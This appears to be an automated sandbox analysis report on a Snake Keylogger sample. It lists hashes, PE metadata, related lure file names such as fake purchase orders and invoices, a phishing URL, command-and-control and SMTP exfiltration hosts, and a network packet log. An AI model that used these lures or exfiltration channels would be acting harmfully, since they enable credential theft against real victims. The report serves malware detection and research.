                            Original Sample Name:e81ff60c955d9f232d4812a68ef4335f204be923d6aa75c5d309e8fe76eed1ed.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.winEXE@1/0@4/4
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 66
                            • Number of non-executed functions: 51
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            TimeTypeDescription
                            10:02:58API Interceptor11316983x Sleep call for process: Zarefy4bOs.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            104.21.67.152SAT8765456000.xlam.xlsxGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                              Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                  1d4D5ndo0x.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                    D09876500900000H.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                      23343100IM00270839_Dekont1.exeGet hashmaliciousSnake KeyloggerBrowse
                                        Payment_Draft_confirmation.xla.xlsxGet hashmaliciousSnake KeyloggerBrowse
                                          e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                            proforma_Invoice_0009300_74885959969_9876.exeGet hashmaliciousSnake KeyloggerBrowse
                                              ATM Dekont E-Maili pdf.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                193.122.6.168109__Purchase_Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                1d4D5ndo0x.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                PT98765445670009.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                SDTP098766700000.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                sipari#U015f formu_831512.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                PROFORMA FATURA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                proforma_Invoice_0009300_74885959969_9876.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                SecuriteInfo.com.Trojan.PackedNET.2725.8730.30889.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                SecuriteInfo.com.Trojan.PackedNET.2725.27231.18654.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                SecuriteInfo.com.Trojan.PackedNET.2725.26841.22155.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                208.91.199.225Request for Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                                  Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    Solicitud de cotizacion.exeGet hashmaliciousAgentTeslaBrowse
                                                      109__Purchase_Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        SecuriteInfo.com.Win32.TrojanX-gen.27067.30548.exeGet hashmaliciousAgentTeslaBrowse
                                                          CV Mariana Alvarez.exeGet hashmaliciousAgentTeslaBrowse
                                                            Quotation - HDPE Fittings.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              CV Mariana Alvarez.exeGet hashmaliciousAgentTeslaBrowse
                                                                CV Mariana Alvarez.exeGet hashmaliciousAgentTeslaBrowse
                                                                  CV Mariana Alvarez.exeGet hashmaliciousAgentTeslaBrowse
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    checkip.dyndns.comVI3 Operation Guide_tech Info versionfdp.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                                    • 132.226.8.169
                                                                    Remittance_copy.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 132.226.247.73
                                                                    SAT8765456000.xlam.xlsxGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                    • 158.101.44.242
                                                                    request-2.doc.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                                    • 132.226.8.169
                                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 132.226.8.169
                                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 158.101.44.242
                                                                    Fuy2BDS9W2.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                    • 132.226.247.73
                                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 132.226.247.73
                                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 193.122.130.0
                                                                    lxdriver_setup.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                                    • 158.101.44.242
                                                                    scratchdreams.tkRemittance_copy.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 104.21.27.85
                                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 104.21.27.85
                                                                    Fuy2BDS9W2.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                    • 104.21.27.85
                                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 104.21.27.85
                                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 104.21.27.85
                                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 172.67.169.18
                                                                    109__Purchase_Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 104.21.27.85
                                                                    1d4D5ndo0x.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                    • 172.67.169.18
                                                                    FGT5000800000.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                    • 104.21.27.85
                                                                    D09876500900000H.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                    • 172.67.169.18
                                                                    us2.smtp.mailhostbox.comAWB-Ref-#32122432 Pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 208.91.199.224
                                                                    Request for Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 208.91.199.225
                                                                    PDF Payment Notification fkHWFp2kdYelWk3.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 208.91.199.224
                                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 208.91.199.225
                                                                    Solicitud de cotizacion.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 208.91.199.225
                                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 208.91.199.224
                                                                    cgprgRztWc.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 208.91.199.223
                                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 208.91.199.224
                                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 208.91.198.143
                                                                    Dhl 984857.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 208.91.199.224
                                                                    reallyfreegeoip.orgRemittance_copy.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 172.67.177.134
                                                                    SAT8765456000.xlam.xlsxGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                    • 104.21.67.152
                                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 172.67.177.134
                                                                    Fuy2BDS9W2.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                    • 172.67.177.134
                                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 104.21.67.152
                                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 172.67.177.134
                                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 104.21.67.152
                                                                    109__Purchase_Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 172.67.177.134
                                                                    1d4D5ndo0x.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                    • 104.21.67.152
                                                                    FGT5000800000.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                    • 172.67.177.134
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    ORACLE-BMC-31898UShttps://letg.pages.dev/account/js-reporting/?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=%2Faccount%2Fchallenge%2FpasswordGet hashmaliciousHTMLPhisherBrowse
                                                                    • 150.136.26.45
                                                                    SAT8765456000.xlam.xlsxGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                    • 158.101.44.242
                                                                    https://objectstorage.sa-saopaulo-1.oraclecloud.com/n/grnf1myuo7lg/b/bucket-20240402-0423/o/indexsmoke.htmlGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                    • 134.70.84.3
                                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 158.101.44.242
                                                                    mrPTE618YB.exeGet hashmaliciousPureLog StealerBrowse
                                                                    • 150.136.132.149
                                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 193.122.130.0
                                                                    lxdriver_setup.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                                    • 158.101.44.242
                                                                    iCareFone.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                                    • 193.122.130.0
                                                                    http://winning.com.de/4LcLKX1386KvIx6mvpavrrenj4MMBOXAWOTDNDYZC32415IMVO1140976R30Get hashmaliciousUnknownBrowse
                                                                    • 193.122.130.38
                                                                    109__Purchase_Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 193.122.6.168
                                                                    CLOUDFLARENETUSShipping Docs.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 172.67.74.152
                                                                    8C3H9zQgK2.exeGet hashmaliciousFormBookBrowse
                                                                    • 104.21.80.13
                                                                    CA8nLhW9fA.exeGet hashmaliciousFormBookBrowse
                                                                    • 66.235.200.22
                                                                    V2i5WDBNV7.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.26.12.205
                                                                    SecuriteInfo.com.Win32.PWSX-gen.28384.29794.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.26.13.205
                                                                    240330_unpackedGet hashmaliciousUnknownBrowse
                                                                    • 104.21.62.22
                                                                    240330_unpackedGet hashmaliciousUnknownBrowse
                                                                    • 104.21.62.22
                                                                    SOA.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.26.12.205
                                                                    payment slip.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 172.67.74.152
                                                                    Swift_copy.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.26.12.205
                                                                    PUBLIC-DOMAIN-REGISTRYUSV2i5WDBNV7.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 207.174.215.249
                                                                    payment slip.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 207.174.215.249
                                                                    SecuriteInfo.com.Heur.26171.30744.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 162.222.226.100
                                                                    AWB-Ref-#32122432 Pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 208.91.199.224
                                                                    Request for Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 208.91.199.225
                                                                    PDF Payment Notification fkHWFp2kdYelWk3.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 208.91.199.224
                                                                    LMZ05240257824426283637366563_Final Order.vbsGet hashmaliciousFormBookBrowse
                                                                    • 45.113.122.18
                                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 208.91.199.225
                                                                    INVOICE_FEB-888201-2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 162.222.226.100
                                                                    Solicitud de cotizacion.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 208.91.199.225
                                                                    CLOUDFLARENETUSShipping Docs.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 172.67.74.152
                                                                    8C3H9zQgK2.exeGet hashmaliciousFormBookBrowse
                                                                    • 104.21.80.13
                                                                    CA8nLhW9fA.exeGet hashmaliciousFormBookBrowse
                                                                    • 66.235.200.22
                                                                    V2i5WDBNV7.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.26.12.205
                                                                    SecuriteInfo.com.Win32.PWSX-gen.28384.29794.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.26.13.205
                                                                    240330_unpackedGet hashmaliciousUnknownBrowse
                                                                    • 104.21.62.22
                                                                    240330_unpackedGet hashmaliciousUnknownBrowse
                                                                    • 104.21.62.22
                                                                    SOA.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.26.12.205
                                                                    payment slip.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 172.67.74.152
                                                                    Swift_copy.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.26.12.205
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    54328bd36c14bd82ddaa0c04b25ed9adVI3 Operation Guide_tech Info versionfdp.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                                    • 104.21.67.152
                                                                    Remittance_copy.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 104.21.67.152
                                                                    file.exeGet hashmaliciousSmokeLoader, Xehook StealerBrowse
                                                                    • 104.21.67.152
                                                                    request-2.doc.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                                    • 104.21.67.152
                                                                    https://my.visme.co/view/w46vn911-northshore-tractor-ltdGet hashmaliciousUnknownBrowse
                                                                    • 104.21.67.152
                                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 104.21.67.152
                                                                    Fuy2BDS9W2.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                    • 104.21.67.152
                                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 104.21.67.152
                                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 104.21.67.152
                                                                    lxdriver_setup.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                                    • 104.21.67.152
                                                                    3b5074b1b5d032e5620f69f9f700ff0eShipping Docs.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.21.27.85
                                                                    V2i5WDBNV7.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.21.27.85
                                                                    SecuriteInfo.com.Win32.PWSX-gen.28384.29794.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.21.27.85
                                                                    SOA.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.21.27.85
                                                                    payment slip.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.21.27.85
                                                                    Swift_copy.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.21.27.85
                                                                    Booking Form PIF.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.21.27.85
                                                                    XXaqdD8Tkb.exeGet hashmaliciousUnknownBrowse
                                                                    • 104.21.27.85
                                                                    Vrikz9XGsd.exeGet hashmaliciousUnknownBrowse
                                                                    • 104.21.27.85
                                                                    XXaqdD8Tkb.exeGet hashmaliciousUnknownBrowse
                                                                    • 104.21.27.85
                                                                    No context
                                                                    No created / dropped files found
                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):5.848474243927881
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                    • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                    File name:Zarefy4bOs.exe
                                                                    File size:133'120 bytes
                                                                    MD5:eb9d9bc525bf2cfd5a566ff1939a65d8
                                                                    SHA1:d1d9c33251db984f86a31033d94e365ff2787ad6
                                                                    SHA256:e81ff60c955d9f232d4812a68ef4335f204be923d6aa75c5d309e8fe76eed1ed
                                                                    SHA512:2a41f25fd63148ed2eb2e1b26ae2c889a09c93bcad8ad5ecdf1e7e8deeeceecc030d6a05c38bd520c49d68219721016e62f6d4dfb35407db8fc53b0264239335
                                                                    SSDEEP:3072:AA1JAirk7zoewGuynWGMUdNL9blyFFAsQ2wvxLO4LygbY:1AirqzoP6Vd9bKv4L7b
                                                                    TLSH:77D31B1937E88814E2FF997302716101C7B6B8531A16DF1D0AD2F4692B7DBA1CE1AF93
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..e..............P.................. ... ....@.. .......................`............@................................
                                                                    Icon Hash:00928e8e8686b000
                                                                    Entrypoint:0x4211be
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x65D90863 [Fri Feb 23 21:04:35 2024 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x211700x4b.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x220000x108f.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x240000xc.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x20000x1f1c40x1f20038fbd64968fd4540516b6ed151d03db4False0.3587788654618474data5.86247167214779IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0x220000x108f0x1200f59392b7fa5e8b22ad0c6b19a0b07c20False0.3663194444444444data4.868462934974607IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x240000xc0x200f07f68609b7dd4d134af65ad7e8480e7False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_VERSION0x220a00x394OpenPGP Secret Key0.42358078602620086
                                                                    RT_MANIFEST0x224340xc5bXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.3926651912741069
                                                                    DLLImport
                                                                    mscoree.dll_CorExeMain
                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                    04/08/24-10:03:49.773592TCP2044767ET TROJAN Snake Keylogger Exfil via SMTP49728587192.168.2.5208.91.199.225
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Apr 8, 2024 10:02:57.340023041 CEST4970580192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:02:57.577135086 CEST8049705193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:02:57.577241898 CEST4970580192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:02:57.577605963 CEST4970580192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:02:57.814512014 CEST8049705193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:02:58.277544022 CEST8049705193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:02:58.282962084 CEST4970580192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:02:58.519921064 CEST8049705193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:02:58.521754026 CEST8049705193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:02:58.568444967 CEST4970580192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:02:58.698631048 CEST49706443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:02:58.698679924 CEST44349706104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:02:58.698781013 CEST49706443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:02:58.705890894 CEST49706443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:02:58.705910921 CEST44349706104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:02:58.970863104 CEST44349706104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:02:58.971009970 CEST49706443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:02:58.975447893 CEST49706443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:02:58.975459099 CEST44349706104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:02:58.975832939 CEST44349706104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:02:59.021430016 CEST49706443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:02:59.042711020 CEST49706443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:02:59.084237099 CEST44349706104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:02:59.262979031 CEST44349706104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:02:59.263076067 CEST44349706104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:02:59.263173103 CEST49706443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:02:59.269284964 CEST49706443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:02:59.272654057 CEST4970580192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:02:59.511491060 CEST8049705193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:02:59.514556885 CEST49707443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:02:59.514596939 CEST44349707104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:02:59.514666080 CEST49707443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:02:59.515074015 CEST49707443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:02:59.515080929 CEST44349707104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:02:59.552709103 CEST4970580192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:02:59.781657934 CEST44349707104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:02:59.784163952 CEST49707443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:02:59.784188986 CEST44349707104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:00.079196930 CEST44349707104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:00.079307079 CEST44349707104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:00.079371929 CEST49707443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:00.080009937 CEST49707443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:00.083276987 CEST4970580192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:00.084616899 CEST4970880192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:00.320198059 CEST8049705193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:03:00.320286036 CEST4970580192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:00.322242022 CEST8049708193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:03:00.322324038 CEST4970880192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:00.322504997 CEST4970880192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:00.560576916 CEST8049708193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:03:00.561847925 CEST8049708193.122.6.168192.168.2.5
                                                                    Apr 8, 2024 10:03:00.563397884 CEST49709443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:00.563441038 CEST44349709104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:00.563507080 CEST49709443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:00.563872099 CEST49709443192.168.2.5104.21.67.152
                                                                    Apr 8, 2024 10:03:00.563885927 CEST44349709104.21.67.152192.168.2.5
                                                                    Apr 8, 2024 10:03:00.615192890 CEST4970880192.168.2.5193.122.6.168
                                                                    Apr 8, 2024 10:03:00.821615934 CEST44349709104.21.67.152192.168.2.5
